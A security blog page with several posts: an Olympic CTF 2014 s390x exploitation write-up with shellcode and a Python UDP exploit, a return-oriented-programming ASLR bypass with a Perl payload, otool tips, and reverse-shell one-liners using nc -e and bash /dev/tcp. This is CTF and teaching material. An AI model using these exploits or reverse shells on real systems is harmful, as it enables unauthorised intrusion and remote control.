Sunday, February 9, 2014

Olympic CTF 2014 - zpwn - s390x exploitation

It is always fun to hack programs under unpopular architectures. This year's Olympic CTF had this interesting challenge with an s390x binary. Unfortunately, I had hard time searching for a good instruction set manual for this architecture. In fact, I really could not locate a single document that summarizes its ISAs, but I found several useful websites including: [1] [2].

Basically, s390s has the following register convention on Linux:
  • r2  : return value, or system call number (equivalent to EAX on x86)
  • r3 - r6 : system call parameters
  • r14 : return address
  • r15 : stack pointer

After learning the basic rule, I looked at the disassembled code of the binary with objdump. Below is the snippet of the disassembly with some comments.

80000b42:   c0 e5 ff ff fe 51       brasl   %r14,800007e4 <recvfrom@plt>
80000b48:   b9 14 00 42             lgfr    %r4,%r2         ; num received
80000b4c:   b9 02 00 44             ltgr    %r4,%r4
80000b50:   a7 84 00 1d             je      80000b8a <__gxx_personality_v0@plt+0x2a6>
80000b54:   b9 04 00 5b             lgr     %r5,%r11        ; r5 = buf ptr
80000b58:   a7 28 ff ff             lhi     %r2,-1          ; r2 = 0xffffffff
80000b5c:   b9 04 00 34             lgr     %r3,%r4         ; n = num_received
80000b60:   43 10 50 00             ic      %r1,0(%r5)      ; r1 = *(char*)ptr // character
80000b64:   41 50 50 01             la      %r5,1(%r5)      ; ptr += 1
80000b68:   17 12                   xr      %r1,%r2         ; xor r1 and r2
80000b6a:   88 20 00 08             srl     %r2,8           ; shift right 8bit
80000b6e:   b9 84 00 11             llgcr   %r1,%r1         ; get only first byte
80000b72:   eb 11 00 02 00 0d       sllg    %r1,%r1,2       ; shift left 2bit (r1 *= 4)
80000b78:   57 21 c0 00             x       %r2,0(%r1,%r12) ; xor
80000b7c:   a7 37 ff f2             brctg   %r3,80000b60 <__gxx_personality_v0@plt+0x27c>
80000b80:   c2 2d ff fc ec c8       cfi     %r2,-201528     ; must be 0xfffcecc8
80000b86:   a7 84 00 14             je      80000bae <__gxx_personality_v0@plt+0x2ca>
80000b8a:   b9 04 00 2a             lgr     %r2,%r10
80000b8e:   b9 04 00 3b             lgr     %r3,%r11
80000b92:   a7 59 00 00             lghi    %r5,0
80000b96:   b9 04 00 69             lgr     %r6,%r9
80000b9a:   a7 19 00 10             lghi    %r1,16
80000b9e:   e3 10 f0 a0 00 24       stg     %r1,160(%r15)
80000ba4:   c0 e5 ff ff fe 70       brasl   %r14,80000884 <sendto@plt>
80000baa:   a7 f4 ff bb             j       80000b20 <__gxx_personality_v0@plt+0x23c>
80000bae:   0d eb                   basr    %r14,%r11       ; jump to the buffer!

1. Vulnerability & Strategy

The vulnerability is at the last line, where we can jump to an address that %r11 is pointing to. It is an "mmap"ed memory region that our input string is stored after "recvfrom" call. However, we must satisfy a condition in order to reach the vulnerable line. A CFI instruction (@ 0x80000b80) constraints the value of %r2 to be 0xfffcecc8. I noticed that %r2 value was initially set to 0xffffffff (@ 0x80000b58), and the value was computed using a tight loop from 0x80000b54 to 0x80000b7c.

This loop reads in every character of a user input, and does some hashing-like operations for each character. And each character is used as an index to static data stored at 0x80000d7c when computing the hash. If you look at the data, it is just a random chunk of data of 1K bytes. So it is not very likely to reach the vulnerable line if we simply send our shellcode to the service, unless we append some more data to modify the hash value.

However, I also noticed that if a hash value does not match, then it jumps back to "recvfrom" (@ 0x80000b20), and gets more input from a user. Moreover, the same buffer is used for every loop iteration. Therefore, the idea is to first send our shellcode that has few dummy bytes at front, and then send another small bytes that can bypass the hash check in the second iteration.

2. Breaking the Hash

I assumed that we can break the hash using small bytes. In order to effectively break it, I wrote a C code that emulates the hashing operation. Also, I extracted the 1K byte data from the binary and stored it into a file called "data".

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
// Olympic CTF 2014 - zpwn emulation, written by funkyG

#include <stdio.h>
#include <stdlib.h>

int swap_endian( int x )
{
    return ((x >> 24) & 0xff)
         | ((x >> 8) & 0xff00)
         | ((x << 8) & 0xff0000)
         | ((x << 24) & 0xff000000);
}

void emulate( char* data, int input )
{
    char* ptr = (char*) &input;
    int num = 4;
    int r2 = 0xffffffff;
    int i;

    for ( i = 0; i < num; i++ ) {
        unsigned int r1 = (unsigned int) (*(unsigned char*)ptr);
        ptr += 1;
        r1 = r1 ^ r2;
        r2 = (unsigned int) r2 >> 8;
        r1 = ((unsigned char)r1) << 2;
        // printf( "r1 = %08x, r2 = %08x, data = %08x\n",
        //         r1, r2, swap_endian(*(unsigned int*)(data + r1)) );
        r2 = swap_endian(*(unsigned int*)(data + r1)) ^ r2;
        // printf( "%08x\n", r2 );
        if ( r2 == 0xfffcecc8 ) {
            printf( "found it!! (%08x) %d\n", swap_endian( input ), i );
            break;
        }
    }
}

int main( int argc, char** argv )
{
    FILE* fp = fopen( "data", "rb" );
    unsigned long fsize = 0;
    char* buf = NULL;
    unsigned int i = 0;

    fseek( fp, 0L, SEEK_END );
    fsize = (unsigned long) ftell( fp );
    fseek( fp, 0L, SEEK_SET );

    buf = (char*) calloc( 1, fsize );
    fread( buf, fsize, 1, fp );
    printf( "data size: %ld\n", fsize );

    for ( i = 0; i < 0xffffffff; i++ ) {
        if ( i % 1000000000 == 0 )
            printf( "\r%.2f\n", (float)i / (float)0xffffffff * 100.0 );
        emulate( buf, i );
    }

    fclose( fp );
    free( buf );
}

When I ran this program, it showed a string in few seconds:
$ ./zpwnhash
found it!! (31eedfb4) 3

3. Crafting a Payload

I will use a two-step approach. First, send a payload that begins with some dummy strings. Second, send another 4-byte string (31eedfb4) in order to jump to our shellcode that I sent in the first step. There is one more thing to consider: we have to check what is the corresponding disassembly code for 31eedfb4! It turns out that (31ee) is a LNER instruction, and (b4a7) is an EMDK instruction. The first one is a NOP for us, but the second one requires us to tweak it in order to access a valid memory address. We can easily bypass this problem by using a relative address with %r5 register, because it already contains a valid memory address. So, I created an 8-byte instruction sequence:
31 ee                    lner %f14,%f14
df b4 54 00 00 00        edmk 1024(181,%r5), 0
Now, we are almost done except that we need a working shellcode. I found an old article from Phrack [3], but this is only for 32-bit s390. So, I had to create my own shellcode for s390x.

Below is the final payload. Notice that I created two separate shellcodes for /bin/ls and /bin/cat. I first tried with a reverse shellcode, but it didn't work out for me (I get a connection back, but it always closes immediately). So I had to use /bin/cat instead of /bin/sh to see the flag.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/usr/bin/python
# payload for zpwn written by funkyG
import socket, struct, os

#host = '127.0.0.1'
host = '109.233.61.11'
port = 31337

udp = (host, port)

s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )

#62 ef 80 82

### /bin/ls
# shellcode = "\x0d\x10\x17\x66\xa7\x29\x00\x02\xa7\x39\x00\x01\x18\x46\xeb\x24\xf0\x80\x00\x24\xa7\x29\x00\x01\x41\x30\xf0\x80\x0a\x66\x42\x60\xf0\x80\x18\x72\x41\x30\x10\x5c\xa7\x49\x00\x10\xeb\x24\xf0\x88\x00\x24\xa7\x29\x00\x03\x41\x30\xf0\x88\x0a\x66\x18\x27\xb9\x82\x00\x33\x0a\x3f\xa7\x3a\x00\x01\x0a\x3f\x41\x20\x10\x64\xe3\x20\x10\x6c\x00\x24\x41\x30\x10\x6c\xb9\x82\x00\x44\x0a\x0b\x00\x02\x1f\x2b\x62\xef\x80\x82\x2f\x62\x69\x6e\x2f\x6c\x73\x00"

### /bin/cat
shellcode = "\x0d\x10\xa7\x29\x00\x02\xa7\x39\x00\x01\x17\x44\xeb\x24\xf0\x80\x00\x24\xa7\x29\x00\x01\x41\x30\xf0\x80\x0a\x66\x18\x72\x41\x30\x10\x56\xa7\x49\x00\x10\xeb\x24\xf0\x88\x00\x24\xa7\x29\x00\x03\x41\x30\xf0\x88\x0a\x66\xb9\x04\x00\x32\x18\x27\xa7\x3a\x00\x01\x0a\x3f\x41\x20\x10\x5e\x41\x30\x10\x67\xeb\x23\x10\x70\x00\x24\x41\x30\x10\x70\x17\x44\x0a\x0b\x00\x02\x1f\x2b\x62\xef\x80\x82\x2f\x62\x69\x6e\x2f\x63\x61\x74\x00\x66\x6c\x61\x67\x2e\x74\x78\x74"

print ( len(shellcode) + 8 )

s.sendto( "\x42\x42\x42\x42\x54\x00\x00\x00" + shellcode, udp )
print( s.recvfrom(1024) )
s.sendto( "\x31\xee\xdf\xb4", udp )
print( s.recvfrom(1024) )

Tuesday, May 4, 2010

Advanced Return-Oriented Exploit

This is a brief introduction to a cool little technique for buffer overflow exploits under the following conditions: the stack is not executable, the stack address is randomized, and the libc address is also randomized. In other words, we cannot simply use return-to-stack and return-to-libc.

A vulnerable program that I am going to use is a modified version of gera's in [1]. Here, we do not have stack canary protection, but I am going to make it much harder by modifying the code a little bit: by adding an exit system call and employing stack and libc address randomization (ASLR). The modified version is shown below:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

int func(char *msg) {
    char buf[80];
    strcpy(buf,msg);
    buf[0] = toupper(buf[0]);
    strcpy(msg,buf);
    printf("Caps: %s\n",msg);
    exit(1);
}

int main(int argc, char** argv) {
    func(argv[1]);
}

1. Vulnerability

There is a classic strcpy vulnerability in the func function. The two consecutive strcpy calls enable us to write arbitrary values in an arbitrary address: first, modify the value of the msg from the first strcpy, and then write arbitrary values from the second strcpy. Note that overwriting the return address of func is not enough because it is protected with an exit system call. It is more clear if you look at the disassembled version of the program:

080484b4 <func>:
 80484b4:       55                      push   %ebp
 80484b5:       89 e5                   mov    %esp,%ebp
 80484b7:       83 ec 58                sub    $0×58,%esp
 80484ba:       8b 45 08                mov    0×8(%ebp),%eax
 80484bd:       89 44 24 04             mov    %eax,0×4(%esp)
 80484c1:       8d 45 b0                lea    -0×50(%ebp),%eax
 80484c4:       89 04 24                mov    %eax,(%esp)
 80484c7:       e8 04 ff ff ff          call   80483d0 <strcpy@plt>
 80484cc:       0f b6 45 b0             movzbl -0×50(%ebp),%eax
 80484d0:       0f be c0                movsbl %al,%eax
 80484d3:       89 04 24                mov    %eax,(%esp)
 80484d6:       e8 d5 fe ff ff          call   80483b0 <toupper@plt>
 80484db:       88 45 b0                mov    %al,-0×50(%ebp)
 80484de:       8d 45 b0                lea    -0×50(%ebp),%eax
 80484e1:       89 44 24 04             mov    %eax,0×4(%esp)
 80484e5:       8b 45 08                mov    0×8(%ebp),%eax
 80484e8:       89 04 24                mov    %eax,(%esp)
 80484eb:       e8 e0 fe ff ff          call   80483d0 <strcpy@plt>
 80484f0:       8b 45 08                mov    0×8(%ebp),%eax
 80484f3:       89 44 24 04             mov    %eax,0×4(%esp)
 80484f7:       c7 04 24 00 86 04 08    movl   $0×8048600,(%esp)
 80484fe:       e8 dd fe ff ff          call   80483e0 <printf@plt>
 8048503:       c7 04 24 01 00 00 00    movl   $0×1,(%esp)
 804850a:       e8 e1 fe ff ff          call   80483f0 <exit@plt>
0804850f <main>:
 804850f:       8d 4c 24 04             lea    0×4(%esp),%ecx
 8048513:       83 e4 f0                and    $0xfffffff0,%esp
 8048516:       ff 71 fc                pushl  -0×4(%ecx)
 8048519:       55                      push   %ebp
 804851a:       89 e5                   mov    %esp,%ebp
 804851c:       51                      push   %ecx
 804851d:       83 ec 14                sub    $0×14,%esp
 8048520:       8b 41 04                mov    0×4(%ecx),%eax
 8048523:       83 c0 04                add    $0×4,%eax
 8048526:       8b 00                   mov    (%eax),%eax
 8048528:       89 04 24                mov    %eax,(%esp)
 804852b:       e8 84 ff ff ff          call   80484b4 <func>
 8048530:       83 c4 14                add    $0×14,%esp
 8048533:       59                      pop    %ecx
 8048534:       5d                      pop    %ebp
 8048535:       8d 61 fc                lea    -0×4(%ecx),%esp
 8048538:       c3                      ret
080484b4 <func>:
 80484b4:       55                      push   %ebp
 80484b5:       89 e5                   mov    %esp,%ebp
 80484b7:       83 ec 58                sub    $0×58,%esp
 80484ba:       8b 45 08                mov    0×8(%ebp),%eax
 80484bd:       89 44 24 04             mov    %eax,0×4(%esp)
 80484c1:       8d 45 b0                lea    -0×50(%ebp),%eax
 80484c4:       89 04 24                mov    %eax,(%esp)
 80484c7:       e8 04 ff ff ff          call   80483d0 <strcpy@plt>
 80484cc:       0f b6 45 b0             movzbl -0×50(%ebp),%eax
 80484d0:       0f be c0                movsbl %al,%eax
 80484d3:       89 04 24                mov    %eax,(%esp)
 80484d6:       e8 d5 fe ff ff          call   80483b0 <toupper@plt>
 80484db:       88 45 b0                mov    %al,-0×50(%ebp)
 80484de:       8d 45 b0                lea    -0×50(%ebp),%eax
 80484e1:       89 44 24 04             mov    %eax,0×4(%esp)
 80484e5:       8b 45 08                mov    0×8(%ebp),%eax
 80484e8:       89 04 24                mov    %eax,(%esp)
 80484eb:       e8 e0 fe ff ff          call   80483d0 <strcpy@plt>
 80484f0:       8b 45 08                mov    0×8(%ebp),%eax
 80484f3:       89 44 24 04             mov    %eax,0×4(%esp)
 80484f7:       c7 04 24 00 86 04 08    movl   $0×8048600,(%esp)
 80484fe:       e8 dd fe ff ff          call   80483e0 <printf@plt>
 8048503:       c7 04 24 01 00 00 00    movl   $0×1,(%esp)
 804850a:       e8 e1 fe ff ff          call   80483f0 <exit@plt>
0804850f <main>:
 804850f:       8d 4c 24 04             lea    0×4(%esp),%ecx
 8048513:       83 e4 f0                and    $0xfffffff0,%esp
 8048516:       ff 71 fc                pushl  -0×4(%ecx)
 8048519:       55                      push   %ebp
 804851a:       89 e5                   mov    %esp,%ebp
 804851c:       51                      push   %ecx
 804851d:       83 ec 14                sub    $0×14,%esp
 8048520:       8b 41 04                mov    0×4(%ecx),%eax
 8048523:       83 c0 04                add    $0×4,%eax
 8048526:       8b 00                   mov    (%eax),%eax
 8048528:       89 04 24                mov    %eax,(%esp)
 804852b:       e8 84 ff ff ff          call   80484b4 <func>
 8048530:       83 c4 14                add    $0×14,%esp
 8048533:       59                      pop    %ecx
 8048534:       5d                      pop    %ebp
 8048535:       8d 61 fc                lea    -0×4(%ecx),%esp
 8048538:       c3                      ret


2. Observation and Strategy


We can only modify an arbitrary memory region from the second strcpy, but it should not be the return address of func, because we need to bypass the exit system call. There are indeed several possible spots to jump to including dtors and GOT. In this example, I am going to overwrite GOT entry of the printf function. A GOT is typically in the code section of a program and its address is not randomized.

Now we can hijack the control flow when the printf is called, so the next step is to decide where to jump. We cannot simply return to libc because its address is randomized (we are not going to use brute forcing here). However, we know that the code section's addresses are fixed, and we are going to use a return-oriented programming technique introduced by Hovav [2]. In this problem, we can only use the code section of this small program. Therefore, there are only a few number of gadgets available.

The return-oriented programming that we are going to design works as follows: (1) retrieve an address to libc's strcpy function from the GOT, (2) compute a relative offset from strcpy function to system function, (3) obtain the address of the system function from the step 1 and 2, (4) set up the stack to have a pointer to "/bin/sh" string, 5) jump to the system function using indirect call (call *%eax).

(Note) Since we are using the "system" function, we cannot actually do "setuid" for this exploit. Calling an "exec" function in libc is trickier, and I will not cover it in this article.

3. Gadgets


We are going to use the following 4 gadgets that we can find from the code section to perform the exploitation.

(1)
0x80485a2 <__libc_csu_init+82>: add    $0xc,%esp
0x80485a5 <__libc_csu_init+85>: pop    %ebx
0x80485a6 <__libc_csu_init+86>: pop    %esi
0x80485a7 <__libc_csu_init+87>: pop    %edi
0x80485a8 <__libc_csu_init+88>: pop    %ebp
0x80485a9 <__libc_csu_init+89>: ret

(2)
0x804838c <_init+44>:   pop    %eax
0x804838d <_init+45>:   pop    %ebx
0x804838e <_init+46>:   leave
0x804838f <_init+47>:   ret

(3)
0x80485ce <__do_global_ctors_aux+30>:   add    0xf475fff8(%ebx),%eax
0x80485d4 <__do_global_ctors_aux+36>:   add    $0×4,%esp
0x80485d7 <__do_global_ctors_aux+39>:   pop    %ebx
0x80485d8 <__do_global_ctors_aux+40>:   pop    %ebp
0x80485d9 <__do_global_ctors_aux+41>:   ret

(4)
0x80484af <frame_dummy+31>:     call   *%eax

4. Final Exploit


Using the above four gadgets, I introduce the following exploit. Notice that this exploit is not just a simple return-oriented programming exploit, there are many techniques involved:
(1) Dynamically retrieving the system function's address from the GOT
(2) Changing the ebp register to point to the bss section so that we can control the esp and ebp continuously.
(3) Setting up the stack address to have enough space for the system call.

First, the second gadget sets up the eax and ebx values that are going to be used in the third gadget when computing the system function's address. The result of the "add 0xf475fff8(%ebx), %eax" instruction must produce the address of system function in libc. Specifically, 0xf475fff8(%ebx) must point to the strcpy's GOT entry, so the strcpy's address in libc is added with the value in eax register.

Changing the ebp register in the first gadget is the most tricky part. In the first gadget, we set up the ebp to point to a writable bss section (More precisely, beyond the bss section). Since the address of 0x804a2e8 is a writable region, we can set the address for ebp and esp. In the second gadget, we can set up the esp value by using the leave instruction. Thus, after the second gadget, both the ebp and the esp will point to the addresses in the bss section.

The final exploit in perl is shown below:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
print "\xa2\x85\x04\x08" . # first gadget
      "AAAAAAAA" . # dummy
      "\xe8\xa2\x04\x08" . # set ebp
      "\x8c\x83\x04\x08" . # second gadget
      "\xc0\x52\xfc\xff" .
      "\x14\xa0\x8e\x13AAAA" .
      "/bin/sh;"  .
      "A"x48 .
      "\x10\xa0\x04\x08" . # GOT entry address of printf
      "\x30\xa0\x04\x08"x0xa0 . # dummy
      "\xce\x85\x04\x08" .
      "\x30\xa0\x04\x08"x0x2 . # dummy
      "\x30\xa0\x04\x08" . # dummy ebp
      "\xaf\x84\x04\x08" . # call *%eax
      "\x30\xa0\x04\x08";

5. Conclusion


There can be many possible ways of bypassing ASLR protections. Here, I present a way to exploit the return-oriented programming technique in a very limited environment: small code space, randomized stack and randomized libc.

Wednesday, April 21, 2010

objdump (disassemble) on Mac OS X

There are two possible ways to disassemble a binary in Mac OS X: (1) install GNU binutils; (2) use otool.

(1) Install GNU binutils from the source (download), or from the MacPort.

(2) Use otool, the Mac OS X native utility. I summarize the usage of otool in the following:

otool -V -s <segment> <section> <file>
disassemble a specific segment and a segment, e.g., otool -V -s __text __TEXT /bin/ls (= objdump -d /bin/ls)

otool -L <file>
print out shared library dependencies (= ldd /bin/ls)

otool -tV <file>
disassemble the text section (= objdump -j .text -d /bin/ls)

otool -dv <file>
dump the contents of the data section (= objdump -j .data -s /bin/ls)

Friday, March 19, 2010

Netcat on Mac OS X

netcat (nc) is a utility for opening arbitrary TCP and UDP connections. According to the nc manual, -e option specifies filename to exec after connect. Thus in general, we can easily make reverse shell by using this command:
nc <addr> <port> -e /bin/sh

However, nc on Mac does not have -e option. Instead, Mac has enabled their bash network redirection (/dev/tcp or /dev/udp). Thus, instead of using nc for reverse binding shell, we can simply use this command:
/bin/bash 0</dev/tcp/addr/port 1>&0 2>&0

Note this will not work on default Debian machines. You have to enable bash network redirection to use this.

Useful reference: http://shudder.daemonette.org/source/BashNP-Guide.txt

Tuesday, February 23, 2010

Instruction Reference Manual on Mac

On Mac OS X, XCode has instruction reference manuals for x86, ARM, and PowerPC by default.

open /Library/Application\ Support/Shark/Helpers/

About

My photo
Hi, I am a PhD candidate at CMU. I was one of the founding members of PPP (Plaid Parliament of Pwning). I like programming in OCaml, F#, Haskell, and C++.